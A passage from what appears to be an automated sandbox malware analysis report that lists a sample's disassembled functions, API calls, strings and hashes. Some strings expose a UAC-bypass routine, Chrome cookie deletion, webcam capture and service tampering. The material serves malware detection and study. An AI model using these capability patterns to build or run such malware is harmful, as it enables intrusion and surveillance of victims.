                                                                • _free.LIBCMT ref: 00450FDE
                                                                • _free.LIBCMT ref: 00451032
                                                                • _free.LIBCMT ref: 0045103D
                                                                • _free.LIBCMT ref: 00451048
                                                                • _free.LIBCMT ref: 00451053
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                • int.LIBCPMT ref: 004111BE
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                • String ID: (mG
                                                                • API String ID: 2536120697-4059303827
                                                                • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040760B
                                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                • CoUninitialize.OLE32 ref: 00407664
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                • API String ID: 3851391207-1839356972
                                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                                Strings
                                                                • UserProfile, xrefs: 0040BAE8
                                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                • API String ID: 2018770650-304995407
                                                                • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __allrem.LIBCMT ref: 0043ACE9
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                • __allrem.LIBCMT ref: 0043AD1C
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                • __allrem.LIBCMT ref: 0043AD51
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 1992179935-0
                                                                • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                • __freea.LIBCMT ref: 10008A08
                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                • __freea.LIBCMT ref: 10008A11
                                                                • __freea.LIBCMT ref: 10008A36
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1414292761-0
                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: H_prologSleep
                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                • API String ID: 3469354165-3054508432
                                                                • Opcode ID: b0885c851fcfaa11fbeaa2e4eb94ca5760e61d5ae2f9e26ba5bd1b1b7bfa12d4
                                                                • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                • Opcode Fuzzy Hash: b0885c851fcfaa11fbeaa2e4eb94ca5760e61d5ae2f9e26ba5bd1b1b7bfa12d4
                                                                • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __cftoe
                                                                • String ID:
                                                                • API String ID: 4189289331-0
                                                                • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strlen.LIBCMT ref: 10001607
                                                                • _strcat.LIBCMT ref: 1000161D
                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                • String ID:
                                                                • API String ID: 1922816806-0
                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                • String ID:
                                                                • API String ID: 3594823470-0
                                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                • String ID:
                                                                • API String ID: 493672254-0
                                                                • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                • _free.LIBCMT ref: 10005B2D
                                                                • _free.LIBCMT ref: 10005B55
                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                • _abort.LIBCMT ref: 10005B74
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                • _free.LIBCMT ref: 004482CC
                                                                • _free.LIBCMT ref: 004482F4
                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                • _abort.LIBCMT ref: 00448313
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
